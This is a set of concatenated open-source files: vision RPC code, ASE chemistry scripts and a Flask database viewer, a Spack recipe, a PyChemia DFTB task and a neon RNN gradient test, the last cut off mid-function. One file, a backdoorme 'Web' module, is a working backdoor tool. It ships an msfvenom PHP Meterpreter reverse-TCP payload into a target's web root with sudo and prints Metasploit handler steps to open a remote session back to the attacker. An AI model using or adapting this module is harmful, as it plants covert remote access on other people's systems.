ylim[1] = max(ylim[1], inputNeuron.location[1] + inputNeuron.rfRadius)
selectionNeuron.rfRadius = int((hypot(xlim[0] - selectionNeuron.location[0], ylim[0] - selectionNeuron.location[1]) + \
hypot(xlim[1] - selectionNeuron.location[0], ylim[1] - selectionNeuron.location[1])) / 2)
# NOTE: We don't need much precision for this estimated RF radius - it is mainly used to categorize these neurons into broad groups, and for display
if minRFRadius is None or selectionNeuron.rfRadius < minRFRadius:
minRFRadius = selectionNeuron.rfRadius
if maxRFRadius is None or selectionNeuron.rfRadius > maxRFRadius:
maxRFRadius = selectionNeuron.rfRadius
# *** Selection neurons to feature neurons (all-to-all, filtered by receptive field size)
featureRFRadiusStep = float(maxRFRadius - minRFRadius) / self.num_feature_neurons # size of each uniform RF radius division to categorize input neurons in the featureNeurons layer
for source in selectionNeurons.neurons:
# All-to-all
#for target in featureNeurons.neurons:
# source.synapseWith(target)
# Filtered by receptive field size
idx = int((source.rfRadius - minRFRadius) / featureRFRadiusStep)
if idx >= self.num_feature_neurons:
idx = self.num_feature_neurons - 1 # ensure idx is range
source.synapseWith(featureNeurons.neurons[idx]) # connect with appropriate feature neuron
selectionNeurons.isConnected = True # NOTE need to explicitly do this since we're not using Population.connectWith()
# *** Selection neurons to themselves (lateral inhibition; TODO make this a re-entrant inhibitory Projection with allow_self_connections=False?)
for source in selectionNeurons.neurons:
for target in selectionNeurons.neurons:
if source == target: continue
source.gateNeuron(target)
# ** Add to dictionary of feature pathways
self.featurePathways[pathwayLabel] = VisualFeaturePathway(label=pathwayLabel, populations=[salienceNeurons, selectionNeurons, featureNeurons], projections=None, output=featureNeurons, timeNow=self.timeNow)
# ** Show neuron layers and connections [debug]
#plotPopulations([salienceNeurons, selectionNeurons, featureNeurons], showConnections=True, equalScaleZ=True) # [debug]
# * Initialize feature vector
self.featureVector = None
self.updateFeatureVector()
@rpc.enable
def getBuffer(self, name):
try:
value = self.buffers[name].get()
if callable(value): # allows output buffer values to be callables (e.g. getter functions) that get called when retrieved
value = value()
#self.logger.debug("%s: %s", name, value) # [verbose]
return value
except KeyError as e:
self.logger.error("Buffer KeyError: %s", e)
except BufferAccessError as e:
self.logger.error("BufferAccessError (get '%s'): %s", name, e)
return None # failed
@rpc.enable
def setBuffer(self, name, value):
try:
#self.logger.debug("%s: %s", name, value) # [verbose]
obj = self.buffers[name].value # NOTE direct access (not encouraged - can this be done using simple Python properties?)
if callable(obj): # allows input buffer values to be callables (e.g. setter functions) that get called when the buffer is written to
obj(value)
else:
self.buffers[name].set(value)
return True # NOTE may not give the right indication if obj was a callable and returned a meaningful value
except KeyError as e:
self.logger.error("Buffer KeyError: %s", e)
except BufferAccessError as e:
self.logger.error("BufferAccessError (set '%s'): %s", name, e)
return False # failed
@rpc.enable
def listBuffers(self, types=False):
"""Return a list of exposed buffers (flat list), optionally with each buffer's type as well (list of 2-tuples)."""
return [(name, buf.__class__.__name__) if types else name for name, buf in self.buffers.iteritems()]
@rpc.enable_image
def getImage(self, key='BGR'):
try:
return self.images[key]
except KeyError as e:
self.logger.error("Image KeyError: %s", e)
return None
@rpc.enable_image
def getFovealImage(self, key='BGR'):
try:
return self.images[key][self.fovealSlice]
except KeyError as e:
self.logger.error("Image KeyError: %s", e)
return None
@rpc.enable_image
def getFixatedImage(self, key='BGR'):
try:
return self.images[key][self.fixationSlice]
except KeyError as e:
self.logger.error("Image KeyError: %s", e)
return None
@rpc.enable_image
def getOutputImage(self):
if self.context.options.gui:
return self.imageOut
else:
return None
class VisionManager(Projector):
"""A version of Projector that defaults to using a VisualSystem as target."""
def __init__(self, target=None, *args, **kwargs):
Projector.__init__(self, target if target is not None else VisualSystem(), *args, **kwargs)
self.visualSystem = self.target # synonym - Projector uses the generic term target
self.ocularMotionSystem = EmulatedOcularMotionSystem(self, timeNow=self.context.timeNow)
self.visualSystem.ocularMotionSystem = self.ocularMotionSystem
def process(self, imageIn, timeNow):
self.ocularMotionSystem.update(timeNow)
return Projector.process(self, imageIn, timeNow)
class FeatureManager(VisionManager):
"""A visual system manager for computing stable features."""
State = Enum(('NONE', 'INCOMPLETE', 'UNSTABLE', 'STABLE'))
min_duration_incomplete = 2.0 # min. seconds to spend in incomplete state before transitioning (rolling buffer not full yet/neurons not activated enough)
min_duration_unstable = 2.0 # min. seconds to spend in unstable state before transitioning (avoid short stability periods)
max_duration_unstable = 5.0 # max. seconds to spend in unstable state before transitioning (avoid being stuck waiting forever for things to stabilize)
min_duration_stable = 0.5 # avoid quick switches (attention deficiency)
max_duration_stable = 2.0 # don't stare for too long (excess fixation)
feature_buffer_size = 10 # number of iterations/samples to compute feature vector statistics over (rolling window)
max_feature_sd = 0.005 # max. s.d. (units: Volts) to tolerate in judging a signal as stable
def __init__(self, *args, **kwargs):
kwargs['screen_background'] = kwargs.get('screen_background', np.uint8([0, 0, 0]))
VisionManager.__init__(self, *args, **kwargs)
self.state = self.State.NONE
self.lastTransitionTime = -1.0
def initialize(self, imageIn, timeNow):
VisionManager.initialize(self, imageIn, timeNow)
self.numFeatures = len(self.visualSystem.featureVector)
self.featureVectorBuffer = np.zeros((self.feature_buffer_size, self.numFeatures), dtype=np.float32) # rolling buffer of feature vector samples
self.featureVectorIndex = 0 # index into feature vector buffer (count module size)
self.featureVectorCount = 0 # no. of feature vector samples collected (same as index, sans modulo)
self.featureVectorMean = np.zeros(self.numFeatures, dtype=np.float32) # column mean of values in buffer
self.featureVectorSD = np.zeros(self.numFeatures, dtype=np.float32) # standard deviation of values in buffer
self.featureMatrixBuffer = np.zeros((self.feature_buffer_size, self.numFeatures, self.visualSystem.num_feature_neurons), dtype=np.float32) # follows featureVectorBuffer
self.featureMatrixMean = np.zeros((self.numFeatures, self.visualSystem.num_feature_neurons), dtype=np.float32) # follows featureVectorMean
self.logger.info("[{:.2f}] Features: {}".format(timeNow, self.visualSystem.featureLabels))
self.transition(self.State.INCOMPLETE, timeNow)
self.logger.debug("Initialized")
def process(self, imageIn, timeNow):
keepRunning, imageOut = VisionManager.process(self, imageIn, timeNow)
# Compute featureVector mean and variance over a moving window (also featureMatrix mean)
self.featureVectorBuffer[self.featureVectorIndex, :] = self.visualSystem.featureVector
self.featureMatrixBuffer[self.featureVectorIndex, :] = self.visualSystem.featureMatrix
self.featureVectorCount += 1
self.featureVectorIndex = self.featureVectorCount % self.feature_buffer_size
np.mean(self.featureVectorBuffer, axis=0, dtype=np.float32, out=self.featureVectorMean) # always update mean, in case someone needs it
# TODO: debug here
np.mean(self.featureMatrixBuffer, axis=0, dtype=np.float32, out=self.featureMatrixMean)
# Change state according to feature vector values (and visual system's state)
deltaTime = timeNow - self.lastTransitionTime
if self.state == self.State.INCOMPLETE and \
deltaTime > self.min_duration_incomplete and \
self.featureVectorCount >= self.feature_buffer_size and \
self.visualSystem.state == VisualSystem.State.FIXATE:
self.visualSystem.setBuffer('intent', 'hold') # ask system to hold gaze (i.e. no saccades)
self.transition(self.State.UNSTABLE, timeNow)
elif self.state == self.State.UNSTABLE or self.state == self.State.STABLE:
if self.visualSystem.state == VisualSystem.State.FIXATE:
np.std(self.featureVectorBuffer, axis=0, dtype=np.float32, out=self.featureVectorSD)
self.logger.debug("[{:.2f}] Mean: {}".format(timeNow, self.featureVectorMean)) # [verbose]
self.logger.debug("[{:.2f}] S.D.: {}".format(timeNow, self.featureVectorSD)) # [verbose]
self.logger.debug("[{:.2f}] Feature matrix:\n {}".format(timeNow, "\n ".join("{}: {}".format(label, self.featureMatrixMean[i]) for i, label in enumerate(self.visualSystem.featureLabels))))
if self.state == self.State.UNSTABLE and deltaTime > self.min_duration_unstable and \
(np.max(self.featureVectorSD) <= self.max_feature_sd or deltaTime > self.max_duration_unstable): # TODO use a time-scaled low-pass filtered criteria
self.transition(self.State.STABLE, timeNow)
elif self.state == self.State.STABLE and deltaTime > self.min_duration_stable and \
(np.max(self.featureVectorSD) > self.max_feature_sd or deltaTime > self.max_duration_stable):
self.transition(self.State.UNSTABLE, timeNow)
self.visualSystem.setBuffer('intent', 'find') # let system return to FIXATE-SACCADE mode (without inhibition)
else: # something made visual system lose focus, including us releasing the system
self.transition(self.State.INCOMPLETE, timeNow)
return keepRunning, imageOut
def transition(self, next_state, timeNow):
self.logger.debug("[{:.2f}] Transitioning from {} to {} state after {:.2f}s".format(timeNow, self.State.toString(self.state), self.State.toString(next_state), (timeNow - self.lastTransitionTime)))
self.state = next_state
self.lastTransitionTime = timeNow
@rpc.enable
def getState(self):
return self.State.toString(self.state)
@rpc.enable
def getFeatureVector(self):
return self.featureVectorMean.tolist()
@rpc.enable
def getFeatureMatrix(self):
return self.featureMatrixMean.tolist() # will be a nested list, not flat
def main(managerType=VisionManager):
"""Run end-to-end visual system."""
context = Context.createInstance(description="Run a VisualSystem instance using a {}".format(managerType.__name__))
print "main(): Creating visual system and manager"
visSystem = VisualSystem()
visManager = managerType(visSystem)
if context.isRPCEnabled:
print "main(): Exporting RPC calls"
rpc.export(visSystem)
rpc.export(visManager)
rpc.refresh() # Context is expected to have started RPC server
print "main(): Starting vision loop"
run(visManager)
if context.isRPCEnabled:
rpc.stop_server() # do we need to do this if server is running as a daemon?
print "main(): Done."
def test_FeatureManager_RPC():
from time import sleep
from multiprocessing import Process, Value
Context.createInstance()
print "test_FeatureManager_RPC(): Creating visual system and manager"
visSystem = VisualSystem()
visManager = FeatureManager(visSystem)
print "test_FeatureManager_RPC(): Exporting RPC calls"
rpc.export(visSystem) # order of export vs. enable doesn't matter - everything will be resolved in refresh(), called by start_server()
rpc.export(visManager)
print "test_FeatureManager_RPC(): Starting RPC server thread"
rpcServerThread = rpc.start_server_thread(daemon=True)
# NOTE shared_loop_flag must be a multiprocessing.Value or .RawValue
# NOTE gui should be set to true only if this is being run in its own dedicated process, without any shared GUI infrastructure
def rpcClientLoop(shared_loop_flag, gui=False):
with rpc.Client() as rpcClient:
while shared_loop_flag.value == 1:
try:
for call in ['FeatureManager.getState', 'FeatureManager.getFeatureVector']: # 'VisualSystem.getOutputImage'
print "[RPC-Client] REQ:", call
retval = rpcClient.call(call)
if isinstance(retval, np.ndarray):
print "[RPC-Client] REP[image]: shape: {}, dtype: {}".format(retval.shape, retval.dtype)
# NOTE Qt (and possibly other backends) can only display from the main thread of a process
if gui:
cv2.imshow("VisualSystem output", retval)
cv2.waitKey(10)
else:
print "[RPC-Client] REP:", retval
if retval is None:
break
sleep(0.5) # small sleep to prevent flooding
sleep(0.5) # extra sleep after each state, vector pair
except KeyboardInterrupt:
break
print "test_FeatureManager_RPC(): Starting RPC client process"
rpc_client_loop_flag = Value('i', 1)
# NOTE No GUI output possible from child process; this will simply print metadata for any images received
rpcClientProcess = Process(target=rpcClientLoop, name="RPC-Client", args=(rpc_client_loop_flag,))
rpcClientProcess.daemon=True
rpcClientProcess.start()
sleep(0.01) # let new process start
print "test_FeatureManager_RPC(): Starting vision loop"
run(visManager)
print "test_FeatureManager_RPC(): Vision loop done; waiting for RPC threads/processes to join..."
rpc_client_loop_flag.value = 0
if rpc.Client.recv_timeout is not None: # just a guess, actual timeout used could be different
rpcClientProcess.join(rpc.Client.recv_timeout / 1000.0 + 1.0)
print "test_FeatureManager_RPC(): RPC client process joined (or timeout)"
rpc.stop_server()
if rpc.Server.recv_timeout is not None: # just a guess, actual timeout used could be different
rpcServerThread.join(rpc.Server.recv_timeout / 1000.0 + 1.0)
print "test_FeatureManager_RPC(): RPC server thread joined (or timeout)"
print "test_FeatureManager_RPC(): Done."
# Testing
if __name__ == "__main__":
# NOTE Defaults to using FeatureManager instead of VisualManager
choices = [('--test_rpc', "Test RPC functionality by running a client, server pair")]
context = Context.createInstance(parent_argparsers=[Context.createChoiceParser(choices)])
if context.options.test_rpc:
test_FeatureManager_RPC()
else:
main(managerType=FeatureManager) # will enable RPC calls if --rpc was passed in
|
napratin/nap
|
nap/vision/visual_system.py
|
Python
|
mit
| 62,141
|
[
"NEURON"
] |
ac79d2d39dd90b62cb00d6e232ad765e8cf214dcdaa13d897fbb0f449f99ebdc
|
from ase.io import read
from ase.calculators.emt import EMT
from ase.neb import NEB
from ase.optimize import BFGS
# read the last structures (of 5 images used in NEB)
images = read('neb.traj@-5:')
for i in range(1, len(images) - 1):
images[i].set_calculator(EMT())
neb = NEB(images)
qn = BFGS(neb, trajectory='neb_restart.traj')
qn.run(fmax=0.005)
|
misdoro/python-ase
|
doc/tutorials/neb/diffusion4.py
|
Python
|
gpl-2.0
| 355
|
[
"ASE"
] |
8dd5764c47321dbf7071d0eb5197b7e255bccd567c4341cdb01ec65139e33817
|
import os
import re
import sys
import os.path
import tempfile
import functools
import ase.db
from ase.db.table import Table, all_columns
from ase.visualize import view
from ase.io.png import write_png
from ase.db.summary import Summary
from flask import Flask, render_template, request, send_from_directory
app = Flask(__name__)
connection = None
home = ''
tables = {}
tmpdir = tempfile.mkdtemp()
next_table_id = 1
open_ase_gui = True
# Find numbers in formulas so that we can convert H2O to H<sub>2</sub>O:
SUBSCRIPT = re.compile(r'(\d+)')
@app.route('/')
def index():
global next_table_id
table_id = int(request.args.get('x', '0'))
if table_id not in tables:
table_id = next_table_id
next_table_id += 1
query = ''
columns = list(all_columns)
sort = 'id'
limit = 100
opened = set()
else:
query, columns, sort, limit, opened = tables[table_id]
if 'toggle' in request.args:
column = request.args['toggle']
if column in columns:
columns.remove(column)
if column == sort.lstrip('-'):
sort = 'id'
else:
columns.append(column)
elif 'sort' in request.args:
column = request.args['sort']
if column == sort:
sort = '-' + column
elif '-' + column == sort:
sort = 'id'
else:
sort = column
elif 'query' in request.args:
query = request.args['query'].encode()
limit = int(request.args.get('limit', '0'))
columns = list(all_columns)
sort = 'id'
opened = set()
table = Table(connection)
table.select(query, columns, sort, limit)
tables[table_id] = query, table.columns, sort, limit, opened
table.format(SUBSCRIPT)
return render_template('table.html', t=table, query=query, sort=sort,
limit=limit, tid=table_id, opened=opened, home=home)
@app.route('/open_row/<int:id>')
def open_row(id):
table_id = int(request.args['x'])
opened = tables[table_id][-1]
if id in opened:
opened.remove(id)
return ''
opened.add(id)
return render_template('more.html',
dct=connection.get(id), id=id, tid=table_id)
@app.route('/image/<name>')
def image(name):
path = os.path.join(tmpdir, name).encode()
if not os.path.isfile(path):
id = int(name[:-4])
atoms = connection.get_atoms(id)
if atoms:
size = atoms.positions.ptp(0)
i = size.argmin()
rotation = ['-90y', '90x', ''][i]
size[i] = 0.0
scale = min(20, 20 / size.max() * 10.0)
else:
scale = 20
rotation = ''
write_png(path, atoms, show_unit_cell=1,
rotation=rotation, scale=scale)
return send_from_directory(tmpdir, name)
@app.route('/gui/<int:id>')
def gui(id):
if open_ase_gui:
atoms = connection.get_atoms(id)
view(atoms)
return '', 204, []
@app.route('/id/<int:id>')
def summary(id):
s = Summary(connection.get(id), SUBSCRIPT)
return render_template('summary.html', s=s, home=home)
def tofile(query, type, limit=0):
fd, name = tempfile.mkstemp(suffix='.' + type)
con = ase.db.connect(name, use_lock_file=False)
for dct in connection.select(query, limit=limit):
con.write(dct,
keywords=dct.get('keywords', []),
data=dct.get('data', {}),
**dct.get('key_value_pairs', {}))
os.close(fd)
data = open(name).read()
os.unlink(name)
return data
def download(f):
@functools.wraps(f)
def ff(*args, **kwargs):
text, name = f(*args, **kwargs)
headers = [('Content-Disposition',
'attachment; filename="{0}"'.format(name)),
] # ('Content-type', 'application/sqlite3')]
return text, 200, headers
return ff
@app.route('/json')
@download
def jsonall():
table_id = int(request.args['x'])
query, columns, sort, limit, opened = tables[table_id]
data = tofile(query, 'json', limit)
return data, 'selection.json'
@app.route('/json/<int:id>')
@download
def json(id):
data = tofile(id, 'json')
return data, '{0}.json'.format(id)
@app.route('/sqlite')
@download
def sqliteall():
table_id = int(request.args['x'])
query, columns, sort, limit, opened = tables[table_id]
data = tofile(query, 'db', limit)
return data, 'selection.db'
@app.route('/sqlite/<int:id>')
@download
def sqlite(id):
data = tofile(id, 'db')
return data, '{0}.db'.format(id)
@app.route('/robots.txt')
def robots():
return 'User-agent: *\nDisallow: /\n', 200
if __name__ == '__main__':
globals()['connection'] = ase.db.connect(sys.argv[1])
globals()['home'] = sys.argv[2]
globals()['open_ase_gui'] = False
app.run(host='0.0.0.0', port=5000, debug=False)
|
askhl/ase
|
ase/db/app.py
|
Python
|
gpl-2.0
| 5,037
|
[
"ASE"
] |
b08e29f7eef6e1f3ec15270c61ed0664c8bf10eb405d53e41e6621a53a0e4f7d
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RTxdbHsapiensUcscHg19Knowngene(RPackage):
"""Annotation package for TxDb object(s)
Exposes an annotation databases generated from UCSC by exposing these as
TxDb objects."""
# This is a bioconductor package but there is no available git repo.
homepage = "https://bioconductor.org/packages/release/data/annotation/html/TxDb.Hsapiens.UCSC.hg19.knownGene.html"
url = "https://bioconductor.org/packages/release/data/annotation/src/contrib/TxDb.Hsapiens.UCSC.hg19.knownGene_3.2.2.tar.gz"
version('3.2.2', sha256='063de2b1174782a0b2b8ab7f04a0bdf3c43252cb67c685a9f8ef2b8e318352e9')
depends_on('r-genomicfeatures@1.21.30:', type=('build', 'run'))
depends_on('r-annotationdbi', type=('build', 'run'))
|
LLNL/spack
|
var/spack/repos/builtin/packages/r-txdb-hsapiens-ucsc-hg19-knowngene/package.py
|
Python
|
lgpl-2.1
| 962
|
[
"Bioconductor"
] |
a10b7579580a79c784e2178c19251e118ef4a96adeb4abdac8c741ddd792ba54
|
import json
import os
import time
from pychemia import pcm_log
from pychemia.crystal import KPoints
from ..dftb import DFTBplus, read_detailed_out
class StaticCalculation:
def __init__(self, structure, workdir, slater_path, waiting=False, kpoints=None, output_file='results.json',
max_scc_iterations=50):
self.structure = structure
self.workdir = workdir
self.slater_path = slater_path
self.waiting = waiting
self.MaxSCCIterations = max_scc_iterations
if isinstance(slater_path, str):
self.slater_path = [slater_path]
self.results = []
self.output_file = output_file
if kpoints is None:
self.kpoints = KPoints.optimized_grid(self.structure.lattice, kp_density=10000, force_odd=True)
else:
self.kpoints = kpoints
def run(self):
dftb = DFTBplus(workdir=self.workdir)
dftb.initialize(structure=self.structure, kpoints=self.kpoints)
dftb.set_slater_koster(search_paths=self.slater_path)
dftb.kpoints = self.kpoints
if os.path.isfile('charges.bin'):
os.remove('charges.bin')
for mixer in ['Broyden', 'Anderson', 'DIIS', 'Simple']:
dftb.basic_input()
dftb.hamiltonian['MaxSCCIterations'] = self.MaxSCCIterations
dftb.hamiltonian['Mixer'] = {'name': mixer}
if os.path.isfile('charges.bin'):
dftb.hamiltonian['ReadInitialCharges'] = True
ret = None
dftb.set_static()
dftb.set_inputs()
dftb.run()
if self.waiting:
dftb.runner.wait()
while True:
if dftb.runner is not None and dftb.runner.poll() is not None:
pcm_log.info('Execution completed. Return code %d' % dftb.runner.returncode)
filename = dftb.workdir + os.sep + 'detailed.out'
ret = read_detailed_out(filename)
print('Mixer= %10s Total_energy= %9.3f iSCC= %4d SCC_error= %9.3E' % (mixer,
ret['total_energy'],
ret['SCC']['iSCC'],
ret['SCC']['SCC_error']))
break
time.sleep(10)
if ret['SCC']['iSCC'] < self.MaxSCCIterations:
break
if ret is not None:
self.results.append({'Mixer'
'kp_grid': self.kpoints.grid,
'iSCC': ret['SCC']['iSCC'],
'Total_energy': ret['total_energy'],
'SCC_error': ret['SCC']['SCC_error']})
def save_json(self):
wf = open(self.output_file, 'w')
json.dump(self.results, wf)
wf.close()
|
MaterialsDiscovery/PyChemia
|
pychemia/code/dftb/task/static.py
|
Python
|
mit
| 3,066
|
[
"CRYSTAL"
] |
e90e36e010ba28b4a8e4e3c4d0d7f9bcf999ef25b143c10776080b87964d86d5
|
from backdoors.backdoor import *
class Web(Backdoor):
prompt = Fore.RED + "(web) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using Web module"
self.core = core
self.options = {
"port" : Option("port", 53929, "port to connect to", True),
"name" : Option("name", "backdoor.php", "name of backdoor", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + "Ships a web server to the target, then uploads msfvenom's php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor."
def get_command(self):
return "echo " + self.core.curtarget.pword + " | sudo -S php /var/www/html/" + self.get_value("name")
def do_exploit(self, args):
port = self.get_value("port")
name = self.get_value("name")
target = self.core.curtarget
target.scpFiles(self, "backdoors/auxiliary/web/install.sh", False)
target.ssh.exec_command("echo " + target.pword + " | sudo -S bash install.sh")
print(GOOD + "Starting Apache server on target...")
os.system("msfvenom -p php/meterpreter_reverse_tcp LHOST=" + self.core.localIP + " LPORT=" + str(port) + " -f raw > " + name)
print(GOOD + "Creating backdoor...")
target.scpFiles(self, name, False)
print(GOOD + "Shipping backdoor...")
target.ssh.exec_command("echo " + target.pword + " | sudo -S rm /var/www/html/" + name)
target.ssh.exec_command("echo " + target.pword + " | sudo -S mv " + name + " /var/www/html")
print("Start a handler with metasploit using the following commands: ")
print("> use exploit/multi/handler")
print("> set PAYLOAD php/meterpreter_reverse_tcp")
print("> set LHOST " + self.core.localIP)
print("> set LPORT " + str(port))
print("> exploit\n")
print("Then visit the site at " + target.hostname + "/" + name)
print("To begin your session, type sessions -i [session id]")
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
|
sovaa/backdoorme
|
backdoors/shell/web.py
|
Python
|
mit
| 2,308
|
[
"VisIt"
] |
8288a3e54348bf5126478b654ca4d775727d720b1510ed5683ca83013aa7ce0b
|
# ----------------------------------------------------------------------------
# Copyright 2015 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
This test compares the NEON recurrent layer against a numpy reference recurrent
implementation and compares the NEON recurrent bprop deltas to the gradients
estimated by finite differences.
The numpy reference recurrent layer contains static methods for forward pass
and backward pass.
The test runs a SINGLE layer of recurrent layer and compare numerical values
The reference model handles batch_size as 1 only
The following are made sure to be the same in both recurrent layers
- initial h values (all zeros)
- initial W, b (ones or random values)
- input data (random data matrix)
- input error (random data matrix)
- the data shape inside recurrent_ref is seq_len, input_size, 1
- the data shape inside recurrent (neon) is feature, seq_len * batch_size
"""
import itertools as itt
import numpy as np
from neon import NervanaObject
from neon.initializers.initializer import Constant, Gaussian
from neon.layers import Recurrent
from neon.transforms import Tanh
from tests.recurrent_ref import Recurrent as RefRecurrent
from tests.utils import allclose_with_out
def pytest_generate_tests(metafunc):
bsz_rng = [1]
if 'refgruargs' in metafunc.fixturenames:
fargs = []
if metafunc.config.option.all:
seq_rng = [2, 3, 4]
inp_rng = [3, 5, 10]
out_rng = [3, 5, 10]
else:
seq_rng = [3]
inp_rng = [5]
out_rng = [10]
fargs = itt.product(seq_rng, inp_rng, out_rng, bsz_rng)
metafunc.parametrize('refgruargs', fargs)
if 'gradgruargs' in metafunc.fixturenames:
fargs = []
if metafunc.config.option.all:
seq_rng = [2, 3]
inp_rng = [5, 10]
out_rng = [3, 5, 10]
else:
seq_rng = [3]
inp_rng = [5]
out_rng = [10]
fargs = itt.product(seq_rng, inp_rng, out_rng, bsz_rng)
metafunc.parametrize('gradgruargs', fargs)
def test_ref_compare_ones(backend_default, refgruargs):
# run comparison with reference code
# for all ones init
seq_len, input_size, hidden_size, batch_size = refgruargs
NervanaObject.be.bsz = NervanaObject.be.batch_size = batch_size
check_rnn(seq_len, input_size, hidden_size,
batch_size, Constant(val=1.0), [1.0, 0.0])
def test_ref_compare_rand(backend_default, refgruargs):
# run comparison with reference code
# for Gaussian random init
seq_len, input_size, hidden_size, batch_size = refgruargs
NervanaObject.be.bsz = NervanaObject.be.batch_size = batch_size
check_rnn(seq_len, input_size, hidden_size, batch_size,
Gaussian())
# compare neon RNN to reference RNN implementstion
def check_rnn(seq_len, input_size, hidden_size,
batch_size, init_func, inp_moms=[0.0, 1.0]):
# init_func is the initializer for the model params
# inp_moms is the [ mean, std dev] of the random input
input_shape = (input_size, seq_len * batch_size)
output_shape = (hidden_size, seq_len * batch_size)
NervanaObject.be.bsz = NervanaObject.be.batch_size = batch_size
# ======== create models ========
# neon RNN
rnn = Recurrent(hidden_size, init_func, Tanh())
# reference numpy RNN
rnn_ref = RefRecurrent(input_size, hidden_size)
Wxh = rnn_ref.Wxh
Whh = rnn_ref.Whh
bh = rnn_ref.bh
# ========= generate data =================
# generate random input tensor
inp = np.random.rand(*input_shape)*inp_moms[1] + inp_moms[0]
inpa = rnn.be.array(inp)
# generate random deltas tensor
deltas = np.random.randn(*output_shape)
# the reference code expects these shapes:
# input_shape: (seq_len, input_size, batch_size)
# output_shape: (seq_len, hidden_size, batch_size)
inp_ref = inp.copy().T.reshape(
seq_len, batch_size, input_size).swapaxes(1, 2)
deltas_ref = deltas.copy().T.reshape(
seq_len, batch_size, hidden_size).swapaxes(1, 2)
# ========= running models ==========
# run neon fprop
rnn.configure((input_size, seq_len))
rnn.allocate()
rnn.fprop(inpa)
# weights are only initialized after doing fprop, so now
# make ref weights and biases the same with neon model
Wxh[:] = rnn.W_input.get()
Whh[:] = rnn.W_recur.get()
bh[:] = rnn.b.get()
(dWxh_ref, dWhh_ref, db_ref, h_ref_list,
dh_ref_list, d_out_ref) = rnn_ref.lossFun(inp_ref, deltas_ref)
# now test the bprop
rnn.bprop(rnn.be.array(deltas))
# grab the delta W from gradient buffer
dWxh_neon = rnn.dW_input.get()
dWhh_neon = rnn.dW_recur.get()
db_neon = rnn.db.get()
# comparing outputs
print '====Verifying hidden states===='
print allclose_with_out(rnn.h_buffer.get(),
h_ref_list,
rtol=0.0,
atol=1.0e-5)
print 'fprop is verified'
print '====Verifying update on W and b ===='
print 'dWxh'
assert allclose_with_out(dWxh_neon,
dWxh_ref,
rtol=0.0,
atol=1.0e-5)
print 'dWhh'
assert allclose_with_out(dWhh_neon,
dWhh_ref,
rtol=0.0,
atol=1.0e-5)
print '====Verifying update on bias===='
print 'db'
assert allclose_with_out(db_neon,
db_ref,
rtol=0.0,
atol=1.0e-5)
print 'bprop is verified'
return
def reset_rnn(rnn):
# in order to run fprop multiple times
# for the gradient check tests the
# rnn internal variables need to be
# cleared
rnn.x = None
rnn.xs = None # just in case
rnn.h_buffer = None
return
def test_gradient_neon_gru(backend_default, gradgruargs):
seq_len, input_size, hidden_size, batch_size = gradgruargs
NervanaObject.be.bsz = NervanaObject.be.batch_size = batch_size
gradient_check(seq_len, input_size, hidden_size, batch_size)
def gradient_check(seq_len, input_size, hidden_size, batch_size,
threshold=1.0e-3):
# 'threshold' is the max fractional difference
# between gradient estimate and
# bprop deltas (def is 5%)
# for a given set of layer parameters calculate
# the gradients and compare to the derivatives
# obtained with the bprop function. repeat this
# for a range of perturbations and use the
# perturbation size with the best results.
# This is necessary for 32 bit computations
min_max_err = -1.0 # minimum max error
print 'Perturb mag, max grad diff'
for pert_exp in range(-5, 0):
# need to generate the scaling and input outside
# having an issue with the random number generator
# when these are generated inside the gradient_calc
# function
input_shape = (input_size, seq_len * batch_size)
output_shape = (hidden_size, seq_len * batch_size)
rand_scale = np.random.random(output_shape)*2.0 - 1.0
inp = np.random.randn(*input_shape)
pert_mag = 10.0**pert_exp
(grad_est, deltas) = gradient_calc(seq_len,
input_size,
hidden_size,
batch_size,
epsilon=pert_mag,
rand_scale=rand_scale,
inp_bl=inp)
dd = np.max(np.abs(grad_est-deltas))
print '%e, %e' % (pert_mag, dd)
if min_max_err < 0.0 or dd < min_max_err:
min_max_err = dd
# reset the seed so models are same in each run
# allclose_with_out(grad_est,deltas, rtol=0.0, atol=0.0)
NervanaObject.be.rng_reset()
# check that best value of worst case error is less than threshold
print 'Worst case error %e with perturbation %e' % (min_max_err, pert_mag)
print 'Threshold %e' % (threshold)
assert min_max_err < threshold
def gradient_calc(seq_len, input_size, hidden_size, batch_size,
epsilon=None, rand_scale=None, inp_bl=None):
NervanaObject.be.bsz = NervanaObject.be.batch_size = batch_size
input_shape = (input_size, seq_len * batch_size)
# generate input if one is not given
if inp_bl is None:
inp_bl = np.random.randn(*input_shape)
# neon rnn instance
rnn = Recurrent(hidden_size, Gaussian(), Tanh())
inpa = rnn.be.array(np.copy(inp_bl))
# run fprop on the baseline input
rnn.configure((input_size, seq_len))
rnn.allocate()
out_bl = rnn.fprop(inpa).get()
# random scaling/hash to generate fake loss
if rand_scale is None:
rand_scale = np.random.random(out_bl.shape) * 2.0 - 1.0
# loss function would be:
# loss_bl = np.sum(rand_scale * out_bl)
# run back prop with rand_scale as the errors
# use copy to avoid any interactions
deltas_neon = rnn.bprop(rnn.be.array(np.copy(rand_scale))).get()
# add a perturbation to each input element
grads_est = np.zeros(inpa.shape)
inp_pert = inp_bl.copy()
for pert_ind in range(inpa.size):
save_val = inp_pert.flat[pert_ind]
inp_pert.flat[pert_ind] = save_val + epsilon
reset_rnn(rnn)
rnn.allocate()
out_pos = rnn.fprop(rnn.be.array(inp_pert)).get()
inp_pert.flat[pert_ind] = save_val - epsilon
reset_rnn(rnn)
rnn.allocate()
out_neg = rnn.fprop(rnn.be.array(inp_pert)).get()
# calculate the loss with perturbations
loss_pos = np.sum(rand_scale*out_pos)
loss_neg = np.sum(rand_scale*out_neg)
# compute the gradient estimate
grad = 0.5*(loss_pos-loss_neg)/epsilon
